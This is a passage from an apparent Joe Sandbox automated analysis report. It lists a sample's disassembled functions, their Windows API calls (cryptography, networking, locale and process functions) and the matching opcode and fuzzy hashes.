    • Opcode Fuzzy Hash: 8a808d415cbc76d3744590f218baf245edb9584b36d54b5e13aff1c2211744a9
    • Instruction Fuzzy Hash: 1B6181B16483846EE321DB64DC46FFB77DDAB44700F00092DF689D62C1DBB4E64487A6
    Function 006A5920 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 137windowCOMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00664304,?,?,00000080), ref: 006A593A
    • _strncpy.LIBCMT ref: 006A598E
    • FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,00664304,00000000,?,?,?,00664304,?), ref: 006A59C9
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • _strrchr.LIBCMT ref: 006A5A06
    • _strrchr.LIBCMT ref: 006A5A2E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00664304), ref: 006A5A68
    • SetLastError.KERNEL32(00000080,?,?,?,?,?,?,?,00664304), ref: 006A5A80
      • Part of subcall function 006A63D0: GetLastError.KERNEL32(?,00000000,?,00664304,?,00664304,?), ref: 006A63EA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$_strrchr$FailureFormatMessage_strncpy
    • String ID: Unknown error %d (%#x)
    • API String ID: 2414996614-2414550090
    • Opcode ID: bc5428be27a39030d8f4b84bb422b2b9ebfe8ba8f438219982bb24b6807333c6
    • Instruction ID: 7b7c13762522e0ec10e6cbdd5dfb6bf073a4b9f306baef9fc22e7b1f1ea3bffa
    • Opcode Fuzzy Hash: bc5428be27a39030d8f4b84bb422b2b9ebfe8ba8f438219982bb24b6807333c6
    • Instruction Fuzzy Hash: 9E514D71A00648EFCB54EFA8C886BAE77B6AF46310F10C159F9199B351D734AE40CFA5
    Function 006B3790 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 126encryptionCOMMON
    Download Yara Rule
    APIs
    • CryptAcquireContextA.ADVAPI32(006E9778,00000000,00000000,00000001,F0000000,?,00000000), ref: 006B37C9
    • CryptImportKey.ADVAPI32(006E9778,00000008,00000014,00000000,00000000,?), ref: 006B3839
    • CryptReleaseContext.ADVAPI32(006E9778,00000000), ref: 006B3852
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B38CE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$Context$AcquireCheckImportReleaseStackVars@8
    • String ID: 4oh
    • API String ID: 775994875-2100234844
    • Opcode ID: f9ff749ec4892093e53e176280f93f942574c0c715c996b382079b6708725e9f
    • Instruction ID: 002b68cb291b55c75bb2d05cc5af72981b1cf76867a2b75c62c5f30661f937fa
    • Opcode Fuzzy Hash: f9ff749ec4892093e53e176280f93f942574c0c715c996b382079b6708725e9f
    • Instruction Fuzzy Hash: 3E41B6B2E00314BBDB50EBA8DC83FDE777AAB45700F404118FA09BB291DA759A4487E5
    Function 00683030 Relevance: 12.1, APIs: 8, Instructions: 133encryptionCOMMON
    Download Yara Rule
    APIs
    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,?,F0000000), ref: 0068308E
    • CryptCreateHash.ADVAPI32(00000000,?,00000000,00000000,00000000), ref: 006830B6
    • CryptDestroyHash.ADVAPI32(00000000), ref: 00683154
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0068316F
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00683186
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$ContextHash$AcquireCheckCreateDestroyReleaseStackVars@8
    • String ID:
    • API String ID: 4072197435-0
    • Opcode ID: 5cc934f4a3b110a091a0e6cabc29c79f590c8a48a5ff61152d4db6f3760ca392
    • Instruction ID: 7985b8cae4b3088477d66136a952d14199fd1e336825e97e85e271ece0fb27b7
    • Opcode Fuzzy Hash: 5cc934f4a3b110a091a0e6cabc29c79f590c8a48a5ff61152d4db6f3760ca392
    • Instruction Fuzzy Hash: 1641D872A00224AFDB60EB98DC86BEE777BAB45F00F114218F905BB390D7759E4487E1
    Function 006E2476 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • GetACP.KERNEL32(?,?,?,?,?,?,006D5038,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006E2537
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,006D5038,?,?,?,00000055,?,-00000050,?,?), ref: 006E2562
    • _wcschr.LIBVCRUNTIME ref: 006E25F6
    • _wcschr.LIBVCRUNTIME ref: 006E2604
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 006E26C5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
    • String ID: utf8
    • API String ID: 4147378913-905460609
    • Opcode ID: b062267815ec69c55da4c9c93a16152f7599991b48004250d71b415122384fdb
    • Instruction ID: c2ae37568b7c9bceaae54de9c67259c0520cc99452bee8606158c1a50e0d45ca
    • Opcode Fuzzy Hash: b062267815ec69c55da4c9c93a16152f7599991b48004250d71b415122384fdb
    • Instruction Fuzzy Hash: 9071F471642387ABDB24AB36CC66EF673AFEF45700F14442AF5059B2C2EA70E9418764
    Function 006E2C02 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,2000000B,006E2F20,00000002,00000000,?,?,?,006E2F20,?,00000000), ref: 006E2C9B
    • GetLocaleInfoW.KERNEL32(00000000,20001004,006E2F20,00000002,00000000,?,?,?,006E2F20,?,00000000), ref: 006E2CC4
    • GetACP.KERNEL32(?,?,006E2F20,?,00000000), ref: 006E2CD9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: f64a8d0f3d557a5651d2bcf108a8dec5b32db1b6f04124d0a6fce9cf6eca1707
    • Instruction ID: aa83352e841bfaa438108a6c06c40f482eea0515f93d2e59d8762ba87fe9d8d1
    • Opcode Fuzzy Hash: f64a8d0f3d557a5651d2bcf108a8dec5b32db1b6f04124d0a6fce9cf6eca1707
    • Instruction Fuzzy Hash: FC21A132A42383AAD7B48B16C910ADF72AFAB54F54B368424E90ADB314E732DD41C750
    Function 006E2DD7 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DC3
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DF9
    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 006E2EE3
    • IsValidCodePage.KERNEL32(00000000), ref: 006E2F2C
    • IsValidLocale.KERNEL32(?,00000001), ref: 006E2F3B
    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006E2F83
    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006E2FA2
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
    • String ID:
    • API String ID: 949163717-0
    • Opcode ID: 1882787b5c3bebf76b522643f46458d860dceedec49ac92e5c7f1ecbd12131d0
    • Instruction ID: 4adb82fce2d55142f6446a1907d66d0bd91b71969f2af76c1fa77ea9dceef99d
    • Opcode Fuzzy Hash: 1882787b5c3bebf76b522643f46458d860dceedec49ac92e5c7f1ecbd12131d0
    • Instruction Fuzzy Hash: 3C514E71A0139AAFEB10DFA6DC55AFA77BFBF04700F144469E914EB290EB709940CB61
    Function 006BA390 Relevance: 7.6, APIs: 5, Instructions: 70encryptionCOMMON
    Download Yara Rule
    APIs
    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000,00000000), ref: 006BA3C6
    • CryptGetHashParam.ADVAPI32(?,00000002,00000010,00000010,00000000), ref: 006BA3EE
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • CryptDestroyHash.ADVAPI32(?), ref: 006BA40D
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 006BA42C
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006BA443
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$Hash$Param$CheckContextDestroyFailureReleaseStackVars@8
    • String ID:
    • API String ID: 2592047032-0
    • Opcode ID: 8e3c4e57001aab9c79bb000c4ac6a44573a8cd98bd59e6b993e9230589330a79
    • Instruction ID: c876fa7c05b064e102be3ec9a7cc5ef0c36f7a18d5f655cc30d9d19d09056543
    • Opcode Fuzzy Hash: 8e3c4e57001aab9c79bb000c4ac6a44573a8cd98bd59e6b993e9230589330a79
    • Instruction Fuzzy Hash: F6217FB1900214AFDB10EF98D886BDDBB6AEB05310F51C259E8089B291C7719E85CBD1
    Function 00682F50 Relevance: 7.6, APIs: 5, Instructions: 65encryptionCOMMON
    Download Yara Rule
    APIs
    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040), ref: 00682F84
    • CryptGenRandom.ADVAPI32(00000000,?,CCCCCCCC), ref: 00682FAA
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00682FC3
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00682FF8
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$Context$AcquireCheckRandomReleaseStackVars@8
    • String ID:
    • API String ID: 2095186926-0
    • Opcode ID: a0f0aa4fb5534902577b8208dbd39e062f45f0e297eba33ea81193b07684191d
    • Instruction ID: 7dd359028afa1493e0cab6946831179981d46d23151d3f0bff3ea95afafb1365
    • Opcode Fuzzy Hash: a0f0aa4fb5534902577b8208dbd39e062f45f0e297eba33ea81193b07684191d
    • Instruction Fuzzy Hash: 3F11C472E00214BFDB10FB5DDC86BDE773AEB05310F114258FA08AB291DA748E8487D5
    Function 0068C000 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068C26E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: bind() failed; %s
    • API String ID: 930174750-1141498939
    • Opcode ID: 6f7a1c6e6d82e6e10563210c2c8306faea41cd73a645c37bb6cc4abd9d1a27f5
    • Instruction ID: 830e78e8183b8c5a6513ee98531fa534a2a9f3385173a9db35c5b9eddea5ed6b
    • Opcode Fuzzy Hash: 6f7a1c6e6d82e6e10563210c2c8306faea41cd73a645c37bb6cc4abd9d1a27f5
    • Instruction Fuzzy Hash: 58816274A00208EFDB14DF58D895BEDB7B6FF45314F1082A8E8496B382D7359A85CB91
    Function 006622E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
    Download Yara Rule
    APIs
    • recv.WS2_32(?,?,?,00000000), ref: 00662308
    • WSAGetLastError.WS2_32 ref: 00662320
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorFailureLastrecv
    • String ID: 3'
    • API String ID: 2694527515-280543908
    • Opcode ID: 8e7c05164999bf74f4e69cb754f36e84a857cffa1d90ce7ccdead063b1cf43f8
    • Instruction ID: baca39741812d3d577781ee6f2149206064f19f5ae751489c1e8ab39ad0d17f2
    • Opcode Fuzzy Hash: 8e7c05164999bf74f4e69cb754f36e84a857cffa1d90ce7ccdead063b1cf43f8
    • Instruction Fuzzy Hash: FE115171D04619DFCB40EFA9D8957DD77B5BB04310F108599E828B7380D7794A80CBD1
    Function 006E2889 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DC3
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DF9
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E28DD
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E2927
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E29ED
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: InfoLocale$ErrorLast_free
    • String ID:
    • API String ID: 3140898709-0
    • Opcode ID: 1e160080be597ccac2c68f67e04193e68b5173dfcc896d2f21ab36c26dc47fe8
    • Instruction ID: e31d08dcf3da7f9c0cae6dd7a14b7be6dd780f4cbff7125e61383d82cf445eba
    • Opcode Fuzzy Hash: 1e160080be597ccac2c68f67e04193e68b5173dfcc896d2f21ab36c26dc47fe8
    • Instruction Fuzzy Hash: 21617F7190134B9FDB289F2ACC92BAA77AFFF04700F144179E905CA285EB74D985CB54
    Function 006C5308 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 006C5400
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 006C540A
    • UnhandledExceptionFilter.KERNEL32(006BD59C,?,?,?,?,?,?), ref: 006C5417
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: a241d80e5ae16fd09e76898ce13c3993527f02db70026bc1ad56e2f768e42ef6
    • Instruction ID: 8f23df7044af7dc40b4e22c34e591e12102186118d4abd81411bf32b482158c6
    • Opcode Fuzzy Hash: a241d80e5ae16fd09e76898ce13c3993527f02db70026bc1ad56e2f768e42ef6
    • Instruction Fuzzy Hash: 9A31C2749012189BCB61DF64DC89BD9BBB9EF08310F5081DAE50CAB261EB709B818F44
    Function 006D3AC5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(?,?,006D3AC4,006FA414,?,?,006FA414), ref: 006D3AE7
    • TerminateProcess.KERNEL32(00000000,?,006D3AC4,006FA414,?,?,006FA414), ref: 006D3AEE
    • ExitProcess.KERNEL32 ref: 006D3B00
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 847fefc98b457895527628af449301e6b59aacb2e169e197c1b226d92bbf6028
    • Instruction ID: a9b75b4f20173acb4f3610133d7f3c5786c1c4a83a8c11a82c2a916d504ad8e1
    • Opcode Fuzzy Hash: 847fefc98b457895527628af449301e6b59aacb2e169e197c1b226d92bbf6028
    • Instruction Fuzzy Hash: 99E08C31800688AFCF916F54CD8AA487F2BFB00341B08402AF9098B331CF35EE41CB81
    Function 006BA2F0 Relevance: 3.0, APIs: 2, Instructions: 37encryptionCOMMON
    Download Yara Rule
    APIs
    • CryptAcquireContextA.ADVAPI32(006BA280,00000000,00000000,00000001,F0000000,?,?,006BA280,?,006B35B3,?,00000000,?), ref: 006BA318
    • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,006BA27C,?,?,006BA280,?,006B35B3,?,00000000,?), ref: 006BA341
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$AcquireContextCreateFailureHash
    • String ID:
    • API String ID: 4198798452-0
    • Opcode ID: dc613eca5e60455070f4aac9d00bd1f37b979ed9c4558fbf4af0aca7a8fc7d13
    • Instruction ID: a3537d5fea8d7fbffb90a4be88d71ae3c56565d4c0d7b586d1671cac3e6c0243
    • Opcode Fuzzy Hash: dc613eca5e60455070f4aac9d00bd1f37b979ed9c4558fbf4af0aca7a8fc7d13
    • Instruction Fuzzy Hash: 2CF03071240314BBE760AB14DC82FD93B6AAB46764F158014FE486F2D1CAB6ED8087D5
    Function 006E2ADC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DC3
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DF9
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E2B30
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_free$InfoLocale
    • String ID:
    • API String ID: 2003897158-0
    • Opcode ID: 1e73c88c7224f8172027f276c253828f6e7efbe5b61c152b383dedd59fc389c3
    • Instruction ID: a8f12d3e95029943394fed55ac2a869a69a0eb9e69dacddf9539dbbe9ce35d1d
    • Opcode Fuzzy Hash: 1e73c88c7224f8172027f276c253828f6e7efbe5b61c152b383dedd59fc389c3
    • Instruction Fuzzy Hash: 7621A172A1234BABDF289E26CC92EBA73AFEF04314B10406EF905D6241EA759D018654
    Function 006E2763 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • EnumSystemLocalesW.KERNEL32(006E2889,00000001,00000000,?,-00000050,?,006E2EB7,00000000,?,?,?,00000055,?), ref: 006E27D5
